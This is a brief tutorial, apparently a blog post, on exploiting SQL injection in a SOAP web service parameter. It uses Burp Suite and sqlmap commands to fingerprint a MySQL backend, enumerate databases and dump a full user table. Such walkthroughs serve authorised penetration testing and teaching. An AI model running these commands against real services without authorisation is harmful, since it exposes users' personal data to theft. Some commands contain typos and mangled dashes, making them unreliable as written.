To test (and exploit) a SOAP message for SQL injection do the following :
- Capture the request in Burpsuite (switch on intercept for the request).
- Copy the whole request and save it as a file (You could also check if specific parameters in the request is vulnerable to SQL – in my example the I replace the authToken parameter with a ‘ and I get a “nice” error message back in the response.
- Use the following SQL command : sqlmap -r /root/Documents/wsdl.txt -p authToken where </root/Documents.wsdl.txt> is the file you saved and <authtoken> is the parameter that you want to test for SQLi
- The parameter is vulnerable and we are informed the backed database is MySQL.
- We can now move onto getting some information from the database. Enumerate the database: sqlmap -r /root/Documents/wsdl.txt -p authToken –dbs.
- We find the database we are after – in this example the database containing users called email3
- Next stop : Dump everything:s qlmap -r /root/Documents/wsdl.txt -p authToken –dbs –dump
- We get what we are after. The whole database with a table called user and all the user information